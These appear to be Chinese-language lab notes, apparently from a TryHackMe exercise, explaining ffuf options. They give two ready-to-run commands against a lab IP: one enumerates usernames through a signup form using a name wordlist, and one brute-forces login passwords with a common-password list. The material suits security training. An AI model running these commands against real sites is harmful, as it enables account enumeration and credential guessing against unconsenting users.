用户名枚举
-w 参数选择计算机上包含我们要检查的用户名列表是否存在的文件的位置
-X 指定请求方法,默认情况下这是一个 GET 请求
-d 参数指定我们要发送的数据(如:用户名、电子邮件、密码和 cpassword)
-H 参数用于向请求添加附加标头
-u 参数指定我们发出请求的 URL
-mr 参数是我们要查找的页面上的文本,以验证我们是否找到了有效的用户名
user@tryhackme$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.104.190/customers/signup -mr "username already exists"
暴力破解
W1 有效用户名列表和W2 我们将尝试的密码列表
-fc 参数来检查 200 以外的 HTTP 状态代码
user@tryhackme$ ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.104.190/customers/login -fc 200